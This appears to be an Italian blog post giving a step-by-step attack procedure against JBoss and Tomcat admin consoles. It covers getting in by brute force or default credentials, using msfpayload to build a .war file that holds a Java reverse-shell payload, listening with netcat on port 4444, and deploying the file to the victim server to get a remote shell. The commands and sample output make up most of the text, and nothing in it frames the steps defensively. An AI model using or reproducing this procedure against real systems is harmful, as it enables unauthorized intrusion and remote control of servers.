Una volta acceduti al pannello di controllo di JBoss (http://target:<port>/jmx-console) o Tomcat (http://target:<port>/manager/htrml), tramite bruteforce/credenziali di default, si dovra' creare una webshell ed eseguire il deploy.
Effettuare i seguenti passi:
1) cercare il payload adatto tramite msfupload e sceglierne uno idoneo:
# msfpayload -l |grep java
2) verificare quali opzioni sono disponibili:
# msfpayload java/shell_reverse_tcp o (ad esempio)
3) creare un .war contenente il payload scelto:
# msfpayload java/shell_reverse_tcp LHOST=ip_vostra_macchina LPORT=4444 W > poc.war
4) mettersi in listen sulla posta 4444 della propria macchina:
# nc -lvp 4444
listening on [any] 4444 ...
5) effettuare il deploy dell'applicazione file "poc.war" sul server vittima (Tomcat o JBoss)
6) eseguire il payload lanciando l'applicazione da browser
Se tutto e' andato a buon fine si otterra' una reverse shell sulla porta 4444 della propria macchina:
# nc -vvlp 4444
listening on [any] 4444 ...
connect to [X.X.X.X] from vittima [X.X.X.X] 52456
Nessun commento:
Posta un commento
Grazie per il commento.